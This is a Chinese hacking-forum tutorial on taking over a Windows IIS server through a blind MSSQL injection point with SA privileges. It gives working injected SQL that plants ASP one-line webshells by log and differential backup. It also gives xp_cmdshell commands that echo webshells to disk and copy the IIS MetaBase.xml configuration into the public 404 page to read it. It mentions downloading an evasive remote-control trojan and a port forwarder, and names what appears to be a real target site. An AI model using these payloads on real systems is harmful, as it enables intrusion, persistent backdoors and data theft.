sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
: J) T3 R9 m  j

                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

- \$ T7 x$ ?3 X                                                                 
                                                                 
                                                                  论坛： http://www.90team.net/
9 O- n, D! O% L) ^$ ~
' W6 I1 G! e$ v7 l# g0 R
& [, k+ n0 ]9 @% S) \. c  N
# ]8 ?# Q; O! X友情检测国家人才网

7 s! I+ \: k# b
内容：MSSQL注入SA权限不显错模式下的入侵

' {, ?% [$ T5 h2 ?
一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
# |# n1 b) l" Z1 j
" J8 Z  L6 G7 d( q0 d我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
1 x9 L8 v; F' i* Q# y

这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
$ h. b- p! ~& C" z( P9 p) J
思路：

- E# i3 G, `. f- b/ h& h4 Z首先：

通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

1.日志备份获得Webshell
6 G% h) ^' g. F7 c: g6 E9 ]  Q
2.数据库差异备份获得Webshell
/ z& D% q+ C. D- _0 G) [
4.直接下载免杀远控木马。
0 W/ |6 _( w* T
) `; `5 w' c! M! M5.直接下载LCX将服务器端口转发出来

! r  _. Q6 k( q" S9 L& `7 U& f6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。

) Q# C) J; F  ]$ d7 J4 {

% K6 U4 H9 `) V3 X5 p在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
& \  Z# R/ }* M
. X. D- I7 t; o; O  i. s我直接演示后面一个方法

' A  ~) l3 p' x: q+ V
: U0 R; p) J7 b( Z, O, r分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL

. s3 t1 U7 D% a- F2 _


, r9 Q: E% E/ S8 L; ]/ ]1 Q- G◆日志备份：
1 Z) X" x* u$ N/ V; }' v. T; ^2 y, P
( M2 y2 }! ]+ `( O0 K
1. 进行初始备份
+ g7 I' n! y1 ^* U( k' |. [  B; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--

" ~! Y; P1 W! g( }8 x- ?& e4 @2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
8 v3 l+ _5 a+ k8 G( L6 q0 J! \# Y( T
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
  
" o9 N4 H( H( B$ c& G5 y& ]3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--


& e" w* `8 z% ~* H0 N: a& h
◆数据库差异备份
; ~' O4 u9 O- m1 Z1 M! L
+ o' S+ V  b# n7 H( z（1. 进行差异备份准备工作
+ [, ?0 Y0 |  A( I( Y7 R
: l4 d9 r& Y: s0 H- L;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码

( E* F) Q' W+ t: _  M' ~8 f
) E' a6 h+ }$ ^4 G' q( `" V$ e（2. 将数据写入到数据库
+ y$ y/ B  @9 p, N;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
  D: x$ V# ]5 V" i0 z( Z2 B% ~
5 @  }- c; Z, X* r0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>

: T+ Z+ v+ p$ O% P% J* J+ o3 l3. 备份数据库并清理临时文件

# z% y6 J6 x4 b. y8 L;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

; @  I$ A1 E% v  U& U5 c0x633A5C746573742E617370  为 c:\test.asp  删除临时文件


5 u6 `  E2 G$ l1 K9 y1 W5 ~
! s9 I8 d: Z! R6 l用^转义字符来写ASP(一句话木马)文件的方法:   
0 D% F' m5 s5 W7 ^  ]' D/ X
4 D! |# j3 E: [8 p3 m( ?1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
4 m; ?& F: N7 A7 Q
读取IIS配置信息获取web路径
4 K4 F/ |1 Y4 T' l. J
     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
* y- a) U. l# w0 I/ Z
执行命令
     
/ R' ]* Q$ Y% g; c     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
8 w7 h( Z& j5 z* J  E8 i) u; p
9 S- t8 d5 C% H9 x4 x- P
, T# x0 L2 X, A8 S" V; t0 ~
, e' Q, l1 A1 c
7 P, @) [$ J3 ~# ]% v
* ^5 `. ^# Y2 a1 v% @

5 R# d* e# {2 V: h, H6 z' X
. D5 `# T  P  `( T- m( C% K% g


  Y( r- z& o9 ]& f: W' }
, c' X/ K5 ^0 x( @  w7 x2 K

% E. o3 s8 A  q
  o) h, J/ v9 i+ o
  t  y9 S3 T- j4 G; t9 y& _- f

  E0 S3 b1 u; C/ U* G
0 w- @/ U; y7 z7 J/ y" T# e4 \
2 l& J6 R4 V  j


- k; q& k, J. _) g4 e: Y$ Z
- q0 H0 w* p( q( g- Q3 I

/ f- t/ T: A$ O; ^* V7 ]2 e

4 x" Z+ t0 T0 ?' l( I4 M
; V: y, Z, U# {


! O+ C% m/ L$ U# }- I, c




4 \4 `0 Z6 j6 m
8 B# g; j5 P5 F0 G




1 c0 x& x7 h, K+ Q. |5 s5 ^( V
2 P" m5 t, ]2 X- D, g+ q/ A
5 o. q7 g5 |+ O  e6 Z+ \# m
6 t/ c; U3 {0 M% g